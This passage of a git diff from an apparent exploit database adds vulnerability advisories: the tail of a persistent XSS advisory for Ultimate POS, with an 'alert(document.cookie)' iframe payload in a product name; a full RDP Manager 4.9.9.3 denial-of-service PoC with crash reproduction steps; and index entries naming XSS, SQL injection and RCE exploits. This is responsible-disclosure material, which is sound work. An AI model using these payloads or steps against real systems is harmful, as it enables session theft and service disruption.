+&profit_percent=0.00&single_dsp=1.00&single_dsp_inc_tax=1.00&variation_images[]=&submit_type=submit
+-
+POST: HTTP/3.0 200 OK
+content-type: text/html; charset=UTF-8
+location: https://pos-uf.localhost.com:8000/products
+set-cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
+Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmN
+mIwYzljMTBmZGUwNzE0In0%3D; Max-Age=7200; path=/; httponly
+
+
+Vulnerable Source: Products (list - name)
+<tbody><tr data-href="https://pos-uf.localhost.com:8000/products/view/158" role="row" class="odd"><td class="selectable_td">
+<input type="checkbox" class="row-select" value="158"></td><td><div style="display: flex;">
+<img src="https://pos-uf.localhost.com:8000/img/default.png" alt="Product image" class="product-thumbnail-small"></div></td>
+<td><div class="btn-group"><button type="button" class="btn btn-info dropdown-toggle btn-xs" data-toggle="dropdown" aria-expanded="false">
+Actions<span class="caret"></span><span class="sr-only">Toggle Dropdown</span></button><ul class="dropdown-menu dropdown-menu-left" role="menu"><li>
+<a href="https://pos-uf.localhost.com:8000/labels/show?product_id=158" data-toggle="tooltip" title="Print Barcode/Label"><i class="fa fa-barcode">
+</i> Labels</a></li><li><a href="https://pos-uf.localhost.com:8000/products/view/158" class="view-product"><i class="fa fa-eye"></i> View</a></li>
+<li><a href="https://pos-uf.localhost.com:8000/products/158/edit"><i class="glyphicon glyphicon-edit"></i> Edit</a></li><li>
+<a href="https://pos-uf.localhost.com:8000/products/158" class="delete-product"><i class="fa fa-trash"></i> Delete</a></li><li class="divider">
+</li><li><a href="#" data-href="https://pos-uf.localhost.com:8000/opening-stock/add/158" class="add-opening-stock"><i class="fa fa-database">
+</i> Add or edit opening stock</a></li><li><a href="https://pos-uf.localhost.com:8000/products/stock-history/158"><i class="fas fa-history">
+</i> Product stock history</a></li><li><a href="https://pos-uf.localhost.com:8000/products/create?d=158"><i class="fa fa-copy">
+</i> Duplicate Product</a></li></ul></div></td><td class="sorting_1">aa"><iframe src="a" onload="alert(document.cookie)"></iframe>
+<br><i class="fab fa-wordpress"></i></td><td>Awesome Shop</td><td><div style="white-space: nowrap;">$ 1.00  </div></td><td>
+<div style="white-space: nowrap;">$ 1.25  </div></td><td> 0  Pieces</td><td>Single</td><td> </td><td></td><td></td><td>AS0158</td>
+<td></td><td></td><td></td><td></td></tr><tr data-href="https://pos-uf.localhost.com:8000/products/view/17" role="row" class="even">
+<td class="selectable_td"><input type="checkbox" class="row-select" value="17"></td><td><div style="display: flex;">
+<img src="https://pos-uf.localhost.com:8000/uploads/img/1528727793_acerE15.jpg" alt="Product image" class="product-thumbnail-small"></div></td>
+
+
+Reference(s):
+https://pos-uf.localhost.com:8000/products/
+https://pos-uf.localhost.com:8000/products/view/
+https://pos-uf.localhost.com:8000/products/23/edit
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be resolved by the following steps ...
+1. Restrict the input on product names to disallow special chars
+2. Encode and filter the input transmitted via post in the name parameter
+3. Escape and sanitize the output in the products listing of the backend
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/exploits/windows/local/50484.txt b/exploits/windows/local/50484.txt
new file mode 100644
index 000000000..82f901d26
--- /dev/null
+++ b/exploits/windows/local/50484.txt
@@ -0,0 +1,166 @@
+# Exploit Title: RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
+# Date: 2021-10-18
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://www.cinspiration.de/uebersicht4.html
+# Software Link: https://www.cinspiration.de/download.html
+# Version: 4.9.9.3
+# Tested on: Linux
+
+Document Title:
+===============
+RDP Manager v4.9.9.3 - Local Denial of Servie Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2309
+
+
+Release Date:
+=============
+2021-10-18
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2309
+
+
+Common Vulnerability Scoring System:
+====================================
+3.6
+
+
+Vulnerability Class:
+====================
+Denial of Service
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+RDP-Manager is a program for the better administration of several remote desktops and further connections. The connection parameters
+as well as user name and password can be stored in the program, the latter also encrypted by an external password if desired. When opened,
+the connections created are clearly structured in individual tabs in the application window, which means that the overview is retained even
+if several connections are open.
+
+(Copy of the Homepage: https://www.cinspiration.de/download.html )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a local denial of service vulnerability in the RDP Manager v4.9.9.3 windows software client.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-06-01: Researcher Notification & Coordination (Security Researcher)
+2021-06-02: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-10-18: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+Low
+
+
+Authentication Type:
+====================
+Restricted Authentication (User Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A local denial of service vulnerability has been discovered in the official RDP Manager v4.9.9.3 windows software client.
+The denial of service attack allows an attacker to freeze, block or crash a local process, service or component to compromise.
+
+The local vulnerability is located in the Verbindungsname and Server input fields of the Verbindung (Neu/Bearbeiten).
+The Verbindungsname and Server inputs are not limited by the size of characters. Thus allows a local privileged attacker
+to add a malformed server entry with a large size that crashs (multiple application errors) the application permanently.
+The entry can be modified as zip backup for imports as sqLitedatabase.db3 to make the software unusable until a full
+reinstall with separate deletes is performed to recover.
+
+Successful exploitation of the denial of service vulnerability results in permanent unhandled software and application crashs.
+
+Vulnerable Input(s):
+[+] Verbindungsname
+[+] Server
+
+Affected Module(s):
+[+] Wiederherstellen (sqLitedatabase.db3)
+
+
+Proof of Concept (PoC):
+=======================
+The local denial of service vulnerability can be exploited by attackers with system access privileges without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce ...
+1. Install the RDP-Manager.exe software for windows
+2. Start the software and add a new entry in the main tab
+3. Include a large amount of characters max 1024 and save the entry
+4. The software freezes and crashs with multiple errors in the actual session and after restart it crash permanently as well
+Note: Alternativly you can export a database with regular valid entry and modify it via backup for a import
+5. Successful reproduce of the local denial of service vulnerability!
+
+
+Credits & Authors:
+==================
+N/A - Anonymous [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=N%2FA+-+Anonymous
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains: 	https://www.vulnerability-lab.com ;	https://www.vuln-lab.com ; https://www.vulnerability-db.com
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 02cd2676e..0353579ff 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11410,6 +11410,7 @@ id,file,description,date,author,type,platform,port
 50470,exploits/windows/local/50470.py,"Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
 50471,exploits/windows/local/50471.py,"YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
 50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",1970-01-01,ro0k,local,windows,
+50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44575,3 +44576,19 @@ id,file,description,date,author,type,platform,port
 50469,exploits/multiple/webapps/50469.rb,"Ericsson Network Location MPS GMPC21 - Privilege Escalation (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
 50473,exploits/multiple/webapps/50473.txt,"i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw",1970-01-01,LiquidWorm,webapps,multiple,
 50474,exploits/multiple/webapps/50474.txt,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)",1970-01-01,P4p4_M4n3,webapps,multiple,
+50475,exploits/php/webapps/50475.txt,"PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50476,exploits/php/webapps/50476.txt,"WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50477,exploits/php/webapps/50477.py,"Fuel CMS 1.4.1 - Remote Code Execution (3)",1970-01-01,"Padsala Trushal",webapps,php,
+50478,exploits/java/webapps/50478.txt,"Eclipse Jetty 11.0.5 - Sensitive File Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java,
+50479,exploits/php/webapps/50479.txt,"WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Luca Schembri",webapps,php,
+50480,exploits/java/webapps/50480.go,"OpenAM 13.0 - LDAP Injection",1970-01-01,"Charlton Trezevant",webapps,java,
+50482,exploits/php/webapps/50482.txt,"Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50483,exploits/php/webapps/50483.txt,"Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
+50485,exploits/hardware/webapps/50485.txt,"Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,hardware,
+50486,exploits/php/webapps/50486.txt,"PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50487,exploits/php/webapps/50487.txt,"PHP Melody 3.0 - 'vid' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
+50489,exploits/php/webapps/50489.txt,"Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
+50488,exploits/php/webapps/50488.txt,"PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,multiple,
+50491,exploits/php/webapps/50491.txt,"Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50492,exploits/php/webapps/50492.txt,"Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,